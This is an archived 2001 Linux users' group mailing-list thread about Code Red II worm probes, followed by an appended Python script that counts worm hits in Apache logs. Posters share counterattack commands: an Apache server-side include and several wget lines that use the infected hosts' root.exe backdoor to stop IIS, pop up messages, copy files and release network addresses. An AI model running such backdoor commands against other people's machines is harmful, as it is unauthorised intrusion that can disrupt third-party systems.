[NTLUG:Discuss] @home, Carrollton TX hits on port 80
Jack Snodgrass
idiotboy at cybermail.net
Sat Aug 11 09:40:19 CDT 2001
Upon further review... calling the explorer program to redirect to a
web page may be a bad thing. I've taken that out of my script.
The Code Red II worm may install its own explorer.exe that does bad
things to the system when it's run the first time. I don't want to
be the one that runs explorer the first time.
jack
----- Original Message -----
From: "Jack Snodgrass" <idiotboy at cybermail.net>
To: <discuss at ntlug.org>
Sent: Saturday, August 11, 2001 9:21 AM
Subject: Re: [NTLUG:Discuss] @home, Carrollton TX hits on port 80
> I don't think that this will work.
>
> I tried it, but lynx called from apache has problems.
> It complains that there is no terminal associated with the lynx process.
>
> I'm using wget -o /dev/null now instead. It might work... but might not.
>
> I tried to access several servers that tried to infect my server but they
> were all busy. None of them were accepting connections. In order for this
> to work, they would have to accept the connection and run the root.exe.
>
> I also used:
>
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+net+send+%2A+Machine+%25COMPUTERNAME%25+has+been+infected+by+the+Code+
> Red+II+worm+and+attacked+my+server"
>
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+net+send+%2A+Please+see+http://www.cert.org/advisories/CA-2001-23.html+
> and+fix+this+server+ASAP."
>
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+explorer+http://www.myservername.net/code_red_worm.html"
>
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+copy+c:\winnt\system32\ipconfig.exe+."
>
> /usr/bin/wget -T 60 -o /dev/null
> "http://$REMOTE_ADDR/scripts/ipconfig.exe?+
> /release"
>
> ( I added the line breaks ) and so far, no boxes have tried to access my
> http://www.myservername.net/code_red_worm.html
> page. Either I'm doing something wrong... or I think.... the servers
> just don't respond to the messages now.
>
> I guess I could try and run this later when they are less busy infecting
> other machines.
>
>
> jack
>
>
>
> ----- Original Message -----
> From: "Michael Collins" <mhtexcollins at austin.rr.com>
> To: <discuss at ntlug.org>
> Sent: Friday, August 10, 2001 9:20 PM
> Subject: Re: [NTLUG:Discuss] @home, Carrollton TX hits on port 80
>
>
> > Saw this on alt.os.linux.slackware...thought you guys might be
> > interested.
> >
> > Open httpd.conf and add:
> > AddType text/html .ida
> > AddHandler server-parsed .ida
> >
> > Restart apache with
> > /var/lib/apache/sbin/apachectl restart
> >
> > Create the file /var/lib/apache/htdocs/default.ida with the following
> > line:
> > <!--#exec cmd="lynx -source
> > http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->
> >
> > Then sit back and watch the bastard machines shut themselves down.
> >
> > Note: This will not work on the original Code Red. That's the one that
> > displays a string of "N" characters instead of "X" characters.
> >
> >
> >
> >
> >
> >
> >
> > J. Jentink wrote:
> > > I am getting about 20 hits an hour right now over my @home cable in
> > > Carrollton.
> > > From my web log, the following are the last few hitters: IP and
> > > reverse DNS lookup
> > >
> > > When I did the reverse DNS on my own IP, it maps to the form..
> > > c*******-a.croltn1.tx.home.com
> > > Looks like I am getting hammered by the @home folks on the west
> > > coast... California, Washington and Oregon.
> > >
> > > My RD light on the cable modem also blinks constantly. I just
> > > disconnect it when I am not using the internet. What fun.
> > >
> > > j.
> > >
> > >
> > >
> > > _______________________________________________
> > > http://www.ntlug.org/mailman/listinfo/discuss
> > >
> > >
> >
> >
> >
> > --
> > Michael H. Collins Admiral: Penguinista Navy International
> > http://www.linuxlink.com Migration
> > Free Linux Email http://www.78704.com
> > A great geek girl mp3 http://24.28.86.53
> > This Ain't California http://geekaustin.com/
> >
> >
>
>
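As an added example (not code from this thread or from any of its posters), here is a small Python log-triage script for the traffic J. Jentink and Michael Collins describe: it reads Apache common-log lines, tells the original Code Red (a run of "N" after default.ida?) from Code Red II (a run of "X"), and counts the probes per source address and per hour. The log lines are constructed for the example and use RFC 5737 documentation addresses, not real hosts.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample Apache common-log lines (documentation addresses, not real hosts).
SAMPLE_LOG = """\
192.0.2.10 - - [10/Aug/2001:20:15:02 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 280
198.51.100.7 - - [10/Aug/2001:20:17:45 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3 HTTP/1.0" 404 280
192.0.2.10 - - [10/Aug/2001:21:03:11 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090 HTTP/1.0" 404 280
203.0.113.5 - - [10/Aug/2001:21:10:00 -0500] "GET /index.html HTTP/1.0" 200 1043
"""

# Apache common log format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)
# The .ida probe: a long run of one filler character right after default.ida?
# The original Code Red fills with "N", Code Red II fills with "X".
IDA_RE = re.compile(r'^/default\.ida\?([NX])\1{7,}', re.IGNORECASE)

def classify(path):
    """Return 'CodeRed', 'CodeRedII', or None for a request path."""
    m = IDA_RE.match(path)
    if not m:
        return None
    return 'CodeRedII' if m.group(1).upper() == 'X' else 'CodeRed'

def parse_line(line):
    """Parse one common-log line into source, hour bucket and worm variant."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group('ts'), '%d/%b/%Y:%H:%M:%S %z')
    return {'ip': m.group('ip'), 'hour': ts.strftime('%Y-%m-%d %H:00'),
            'variant': classify(m.group('path'))}

def summarize(log_text):
    """Count worm probes by variant, by source address and by hour."""
    by_variant, by_source, by_hour = Counter(), Counter(), Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec['variant'] is None:
            continue  # malformed line or ordinary, non-worm traffic
        by_variant[rec['variant']] += 1
        by_source[rec['ip']] += 1
        by_hour[rec['hour']] += 1
    return {'by_variant': dict(by_variant), 'by_source': dict(by_source),
            'by_hour': dict(by_hour)}

if __name__ == '__main__':
    for key, counts in summarize(SAMPLE_LOG).items():
        print(key, counts)
```

Pointing `summarize` at a real access_log gives the per-hour hit rate the original post estimates by hand, and the per-source counts are what you would hand to the upstream provider's abuse desk.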